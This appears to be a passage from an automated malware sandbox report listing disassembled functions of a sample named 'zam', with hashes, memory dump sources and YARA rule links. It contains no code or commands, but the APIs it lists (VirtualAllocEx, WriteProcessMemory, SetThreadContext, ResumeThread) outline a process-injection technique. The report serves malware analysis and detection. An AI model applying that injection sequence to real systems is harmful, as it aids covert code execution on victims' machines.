Opcode Fuzzy Hash: d965e5f3a8aee4bf616a3c7714f0d4f9db6b3d3edbe03217130a8e4dc74ad175
Instruction Fuzzy Hash: 5C51E674E002089FDB08DFEAC844A9EFBB2FF88301F14812AE815AB358DB355946CF50

Function 069876C0 Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

$q, xrefs: 0698777C
$q, xrefs: 0698779F

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: b02f8f076b4909232698dd1cbfe0693821c0104dbe0165df1d798b9b1052f8da
Instruction ID: e10736f58e65634e21c2f7cd3b79fbe79e4c26084fd281d6807d1f7d8c38902c
Opcode Fuzzy Hash: b02f8f076b4909232698dd1cbfe0693821c0104dbe0165df1d798b9b1052f8da
Instruction Fuzzy Hash: 9F31D8347042018FDB65EBB5C89473E7B7AFB85210B34089AD052CF795DB68CC81C7A1

Function 06DA8A0D Relevance: 1.8, APIs: 1, Instructions: 251processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06DA8C4E

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1b10c5873a80af3df8ad46e5062cc7359042f81fbad25e89073c7e3f151e6608
Instruction ID: 4fdebc672df2336d384b590a18d5e6b643381587d5b7c40d47970a07a3313bc3
Opcode Fuzzy Hash: 1b10c5873a80af3df8ad46e5062cc7359042f81fbad25e89073c7e3f151e6608
Instruction Fuzzy Hash: 57A15971D047199FEB64CF68C841BEDBBF2BF48310F14866AE809A7280DB749985DF91

Function 06DA8A18 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06DA8C4E

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4359d01aac11145bd72a36ebe518024f3c22c605a45dd36a2fe8fb9dfa0d39a6
Instruction ID: 03d0dfc85adf9fab6e5d3565dad51eacca434549e71ce8ad93bef14dce5e3317
Opcode Fuzzy Hash: 4359d01aac11145bd72a36ebe518024f3c22c605a45dd36a2fe8fb9dfa0d39a6
Instruction Fuzzy Hash: 42916971D047199FEF64CF68C840BEDBBB2BF48314F1486AAD809A7280DB749985DF91

Function 024ACCC8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1310188222.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_zam.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b04bd67429f63209c524de7bd00ed67584a9ac0b32ea21a3bbaecbe97e752846
Instruction ID: 723d0e77cf0564f103bd36555d6298cadd1a9dc5737fa8309a0b73222c9f3cd1
Opcode Fuzzy Hash: b04bd67429f63209c524de7bd00ed67584a9ac0b32ea21a3bbaecbe97e752846
Instruction Fuzzy Hash: 87712370A00B059FDB64DF2AD49479ABBF1FF88204F008A2ED48ADBB50D775E945CB91

Function 024A73CD Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 024A7489

Memory Dump Source

Source File: 00000000.00000002.1310188222.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_zam.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6be016898b0d53fbc4073ac8362654f77125a067f0272e14fa1bcabb179c3385
Instruction ID: 7094a451a0926c042b3cd95375af1531f0f6d5e5c2fc7a0e389db05216b8e8d7
Opcode Fuzzy Hash: 6be016898b0d53fbc4073ac8362654f77125a067f0272e14fa1bcabb179c3385
Instruction Fuzzy Hash: 2041D2B0C00719CBEB24CFA9C844BCEFBB5BF49304F20846AD409AB251DBB56945CFA1

Function 024A5F74 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 024A7489

Memory Dump Source

Source File: 00000000.00000002.1310188222.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_zam.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a95778561609771e0bad1fef53e6aebe88f98ffddf68661a4aba2b5dccd0736a
Instruction ID: 16aba77e48ce8058c940935860b9b1967f05c8eae8d165ac58dfc613922d003d
Opcode Fuzzy Hash: a95778561609771e0bad1fef53e6aebe88f98ffddf68661a4aba2b5dccd0736a
Instruction Fuzzy Hash: ED41D271C00719CBEB24DFAAC854BDEFBB5BF49304F20846AD408AB251DBB56945CF90

Function 06DAD233 Relevance: 1.6, APIs: 1, Instructions: 77windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06DAD1FD

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: f70b3f2077c4de80b4e17a348c1c6599705938195e46dbc02cc4d29d7e3264c7
Instruction ID: 5049ecca6412bd8d23b0a64cf22fea456038b6810088ef81ef7c222d3d82d821
Opcode Fuzzy Hash: f70b3f2077c4de80b4e17a348c1c6599705938195e46dbc02cc4d29d7e3264c7
Instruction Fuzzy Hash: CA2143B6D08318AFEB21DF99D804BEEBBF6BF88310F148419D440A7640CB75A944CBA0

Function 06DA8788 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06DA8820

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e43d5350f83d6e0d55f471305802a01cbe3cbf2e180839beb70de8d8782641fa
Instruction ID: 921460abbbd7e2321086491ce2b4d7e07673ed057807ac2acdb06343e1c5f094
Opcode Fuzzy Hash: e43d5350f83d6e0d55f471305802a01cbe3cbf2e180839beb70de8d8782641fa
Instruction Fuzzy Hash: 39214876D003499FDB20CFAAD885BDEBBF5FF48310F148429E959A7240C7789945DBA0

Function 06DA8790 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06DA8820

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e5dbb3cba95bb5868ce76bef5ef04876ca019bf6af33c96020f6b17892e86b34
Instruction ID: c4880e8348cee2e5f20e01ddff4389911701ddfe1954e9a578bb35c120717bd5
Opcode Fuzzy Hash: e5dbb3cba95bb5868ce76bef5ef04876ca019bf6af33c96020f6b17892e86b34
Instruction Fuzzy Hash: 5F212776D003499FDB10DFAAC880BDEBBF5FF48310F108429E919A7240C7789944DBA0

Function 06DA85F0 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06DA8676

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 43ac4eeb38e91b42f3f6d6556f47d5a21706bf02e020c2fbec63a906a7a6de58
Instruction ID: aa180cf76fbe96e112fd3d024e5558f2df686ef4e345f6aa285e98a7f995e3aa
Opcode Fuzzy Hash: 43ac4eeb38e91b42f3f6d6556f47d5a21706bf02e020c2fbec63a906a7a6de58
Instruction Fuzzy Hash: FC214872D043088FDB14DFAAC4847EEBBF4EF49314F24842AD859A7241C7789945CFA4

Function 06DA8879 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06DA8900

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: eab7f08a405961a28eac9608ac04476ab01cee2fe856b64be12e16766836dd3e
Instruction ID: bbc430e51dbe98e24ce9fa74d207c4e266248684765cb3c7d1edab39bd9c9b87
Opcode Fuzzy Hash: eab7f08a405961a28eac9608ac04476ab01cee2fe856b64be12e16766836dd3e
Instruction Fuzzy Hash: EA2126B1C043599FDB10CFAAC880BEEBBF5FF48310F10842AE959A7251C7749540CBA5

Function 024AEAF0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024AF16E,?,?,?,?,?), ref: 024AF22F

Memory Dump Source

Source File: 00000000.00000002.1310188222.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_zam.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0d1b70d106c588734e03c98543c7333714ff98d80779abbb2b169be3cabc788e
Instruction ID: 0671f2ba31a62c878315b3d3d6b68c984f679f19e58200aa3eab7bead3ab6abc
Opcode Fuzzy Hash: 0d1b70d106c588734e03c98543c7333714ff98d80779abbb2b169be3cabc788e
Instruction Fuzzy Hash: 4721E4B6D003499FDB10CF9AD984BEEBBF4EB48310F14806AE914A7310D375A944CFA5

Function 06DA85F8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06DA8676

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ea19ab4589b2dfa6ed4a68b8ecb4303be92c921043397036ab94740ef8e25d75
Instruction ID: 5d5c2b14a5d576e1de5a1652b835f086b1ad13bfe085db8abee60bea76c471c9
Opcode Fuzzy Hash: ea19ab4589b2dfa6ed4a68b8ecb4303be92c921043397036ab94740ef8e25d75
Instruction Fuzzy Hash: 09213871D003098FDB54DFAAC4847EEBBF4EF48210F148429D819A7340C7789945CFA4

Function 06DA8880 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06DA8900

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 7bc66a86e4077bd4896dd4e3c2d9073a6f0804819c80498af130d36cce7c8db0
Instruction ID: 7bf207c04ab3b19fc338eda94ca01fe447c864fb6641589fcc31f87aa33c3244
Opcode Fuzzy Hash: 7bc66a86e4077bd4896dd4e3c2d9073a6f0804819c80498af130d36cce7c8db0
Instruction Fuzzy Hash: EF2125B5C003499FDB10DFAAC880BEEBBF5FF48310F50842AE959A7250C7789941CBA1

Function 06DA86C8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06DA873E

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 22677dce3f2527ccaa3d3cf12325c7403925a76316a703ab6f3a5d904440fe77
Instruction ID: 035a1baeb4b001f4cb37833ddcd3dadb96d5db67b2c99dac92f4bca269c4fdda
Opcode Fuzzy Hash: 22677dce3f2527ccaa3d3cf12325c7403925a76316a703ab6f3a5d904440fe77
Instruction Fuzzy Hash: B4115976D003498FDB20DFAAD8447DEBBF5EF48320F248819D915A7250C7759945CFA0

Function 06DA8540 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06DA85AA

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 67c707e21058fac1e320fea028cd8d8fc5d4c2502b0f48740c2d8d18c55f3a20
Instruction ID: f5fdcb021c671fc8cd533d591d72cb0b0dc67a0c0dcd5b7cbc3a25e0e4a4ae34
Opcode Fuzzy Hash: 67c707e21058fac1e320fea028cd8d8fc5d4c2502b0f48740c2d8d18c55f3a20
Instruction Fuzzy Hash: FF113775D043488FDB24DFAAC8447EEFBF5EF88320F248429D856A7240C6756945CFA4

Function 06DA86D0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06DA873E

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 165f92cda69fea26eeb020db8c97a0cb564a463b2e7662aeb4af78f3481bbe01
Instruction ID: d23e8f750056ab6d8688999d06e9337e76c6a5bf150b64be77dc41158298a922
Opcode Fuzzy Hash: 165f92cda69fea26eeb020db8c97a0cb564a463b2e7662aeb4af78f3481bbe01
Instruction Fuzzy Hash: 4E113776D003499FDB24DFAAC844BEEBBF5EF88320F248419E915A7250C775A945CFA0

Function 024AC66C Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,024ACCE4), ref: 024ACF1E

Memory Dump Source

Source File: 00000000.00000002.1310188222.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_zam.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 83be50d9c4c7982138e655e39f2aec5950cf1be1b3f514fcc56313049f956784
Instruction ID: a9aed681449caba93c47293db3eccec24629b5cd0abee98d20ce7f24ef48ec32
Opcode Fuzzy Hash: 83be50d9c4c7982138e655e39f2aec5950cf1be1b3f514fcc56313049f956784
Instruction Fuzzy Hash: E211F3B6D002498FDB20CF9AD444BDEFBF4EB98214F10846AE819A7750D375A545CFA1

Function 06DA8548 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06DA85AA

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b309a3dcee04cf8d3bdb37cdbb199bfa27b47b2d9da7f4c20468c35cf2fd734b
Instruction ID: 0b310d899a5fb01c31f8833ebecfd6a8e1a044263eb77846609be8d548723c70
Opcode Fuzzy Hash: b309a3dcee04cf8d3bdb37cdbb199bfa27b47b2d9da7f4c20468c35cf2fd734b
Instruction Fuzzy Hash: 73113AB5D003488FDB24DFAAC8447EEFBF5EF88224F248419D819A7240C775A945CFA4

Function 06DAD198 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06DAD1FD

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d599f854ea07b2faaf4423c5bd0799338692307a7a06334d2c313f1506acd56f
Instruction ID: e5e696bb63565be89fa39de19ccad2d188325369e905ab1baf59deb711d5a1cb
Opcode Fuzzy Hash: d599f854ea07b2faaf4423c5bd0799338692307a7a06334d2c313f1506acd56f
Instruction Fuzzy Hash: 4611E3B5804349DFDB20DF9AD884BDEBBF8FB48310F20841AE554A7650C375A584CFA5

Function 06DAB380 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06DAD1FD

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 5350550dbf7091d03ce50af1878e9d79cc4a79fdeb167e459859028a8e8fae5d
Instruction ID: e2e78e202ae395d9d80380df42ba9919c9a4c338f114e2dae044dc30b8cd6b46
Opcode Fuzzy Hash: 5350550dbf7091d03ce50af1878e9d79cc4a79fdeb167e459859028a8e8fae5d
Instruction Fuzzy Hash: 691136B58043489FDB20DF8AC844BEEBBF8EB48310F108459E518A7700C374A944CFA0

Function 0698BE94 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

Teq, xrefs: 0698EB71

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 355e466f2c530588d599e6e2d83642a71f660c1c1c6230dbac6dfd81e8f80a5d
Instruction ID: ce1e373c15f5506203d812b0dc7bbf41c330bca8238c9973408202e327fdea28
Opcode Fuzzy Hash: 355e466f2c530588d599e6e2d83642a71f660c1c1c6230dbac6dfd81e8f80a5d
Instruction Fuzzy Hash: 98517E71B102058FDB50EB79D854A7EBBF6EFC5264B248929E429DB390EB709C0187A1

Function 0698C8A0 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

r, xrefs: 0698CA4A

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 314d27cfa313ee7d5a0da5a2b960820f88e2e91cdcf76cd3ea95ebb9daaf8517
Instruction ID: 7422b109dc4286cac308c6ced30dab8edc202569df075bc0c8c524aad772181c
Opcode Fuzzy Hash: 314d27cfa313ee7d5a0da5a2b960820f88e2e91cdcf76cd3ea95ebb9daaf8517
Instruction Fuzzy Hash: CE612774A00206DFD744DFA9C5849AEFBB6FF88315B21C695D805AB205C735EE82CFA0

Function 0698C892 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

r, xrefs: 0698CA4A

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 0992f74d94b2eb04dc93bccc5f3d7ced35d2b8a556e39312240ce0bbf1cc8708
Instruction ID: ac36c5d0ee0600f1f1c28335cc8350dab7561ac5967d896059b578d082b1c821
Opcode Fuzzy Hash: 0992f74d94b2eb04dc93bccc5f3d7ced35d2b8a556e39312240ce0bbf1cc8708
Instruction Fuzzy Hash: 3A315C74E01609CFDB48DFAAC5449AEBBB2FF8931AB10C4A9D405A7325D7359D41CF60

Function 0698E930 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

Teq, xrefs: 0698E99B

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 88ac73ff73b560c1a6a8d78bbaf4bbe14d894f8449be1b3181ca884f6ef9662b
Instruction ID: 2a984ac15f555b2eeb0db55d98ecbe770d7729657624a1ce2cf09a77ef36787a
Opcode Fuzzy Hash: 88ac73ff73b560c1a6a8d78bbaf4bbe14d894f8449be1b3181ca884f6ef9662b
Instruction Fuzzy Hash: AB114C31F0060A8FCB94EBB998116FEB6F6BF88311B20416AD505E7344EB729D11CBA1

Function 069868A0 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3a0643cdef15bcd5f94af79b1ddb5d720649d621e877e828b8570e6b558877c
Instruction ID: ba0e0a071642e1bc49e3ea66964f979477a9bbde0323b19ebc568b46748e09af
Opcode Fuzzy Hash: b3a0643cdef15bcd5f94af79b1ddb5d720649d621e877e828b8570e6b558877c
Instruction Fuzzy Hash: 00716D34B102158FCB94EF29C484A6A7BEAEF89221F2540A5E902CF7B0DB75DC41CB90

Function 0698DBAA Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3337625ebfa06226ce64be82f7e518d5d9bdeeffca0105eb65ea70700a54edf
Instruction ID: 082f256dbab4e80607e00b82afa9a695683a75543364cdc6f410352535ca3bf7
Opcode Fuzzy Hash: a3337625ebfa06226ce64be82f7e518d5d9bdeeffca0105eb65ea70700a54edf
Instruction Fuzzy Hash: F5714874E01208CFCB04EFA9E484AEEBBB2FF89311F108569E945A7364DB35A945CF50

Function 0698DBB8 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 914f7c84d5e7cba708f95ebef57187d4a8d445b0b2fee515338d25df38ad7be9
Instruction ID: dee1c65a9f7f76f388c36cc0e01c227c022978d473d9005e38d108cf5ce3fe68
Opcode Fuzzy Hash: 914f7c84d5e7cba708f95ebef57187d4a8d445b0b2fee515338d25df38ad7be9
Instruction Fuzzy Hash: EC713674E01208CFCB04EFA9D4849EEBBB2FF88311F108569E955A7364DB35A945CF64

Function 069898A0 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bffdcbc4662369485b5a75f9d5495fc5234504bafe963d051c0859acf22f22bf
Instruction ID: 254be03f3168c53138ee97c956eca8fa7b963f8ddcddb242f0a32248a673d7b5
Opcode Fuzzy Hash: bffdcbc4662369485b5a75f9d5495fc5234504bafe963d051c0859acf22f22bf
Instruction Fuzzy Hash: 94617B71E107498FDF11DFADC440AAEFBF6AF8A310F208659E845BB641E770A981CB40

Function 06989890 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62aacfcd10bf64697eb0c3e71507c01cbe526145d0aea37b60743f24e239a9c2
Instruction ID: 08727cdfaab560e776e8b92b8cdc922067966f44c1ce3dc0d50e9c32f2c02339
Opcode Fuzzy Hash: 62aacfcd10bf64697eb0c3e71507c01cbe526145d0aea37b60743f24e239a9c2
Instruction Fuzzy Hash: ED519D31E147899FDF21CFA9C4406EDFBF6AF8A310F248659E845BB641E371A981CB40

Function 06988A73 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ac4e7e3c81b44e665b13d944a27b401fdb4c0221d82fe3084a8de091f3003d8
Instruction ID: 0e02c40c52e08efbcf56dc3b02f203692041da0ca0076c422936840f2d1f5abc
Opcode Fuzzy Hash: 5ac4e7e3c81b44e665b13d944a27b401fdb4c0221d82fe3084a8de091f3003d8
Instruction Fuzzy Hash: B241BF31A00249DFDF51DFA4C944AAEBBB2FF89320F448555E845AB695D334ED11CBA0

Function 069833A0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da6cb00448f4832e2884f36ad49647c34014783ee0c80528ec24524afc1cd65f
Instruction ID: dadd1222b2088f3dba17925f2cae55999671c41b8ce43828d0be88824516b785
Opcode Fuzzy Hash: da6cb00448f4832e2884f36ad49647c34014783ee0c80528ec24524afc1cd65f
Instruction Fuzzy Hash: 02310730A08215DFDB51AFF5C8406BBBBB6EB84B00F54896BE66697681C739DD01CB90

Function 06983E90 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05d7121ed5a305ce04fa987ca267384a0a171db09605077c24adc6b5e7d4305f
Instruction ID: bf04c723cc3fcae28204f73f44e727d347ab52c7e37f4de96683a5c6ebbe2e1d
Opcode Fuzzy Hash: 05d7121ed5a305ce04fa987ca267384a0a171db09605077c24adc6b5e7d4305f
Instruction Fuzzy Hash: CF31B131704209AFEF41AFA8D854AAE3BB6FB58710F104014F9058B795CB78DE61EBD1

Function 06983390 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd3b5a11767a4cb8597af79e7b9ca906b111da601c488a8d2b17eff2208e32cd
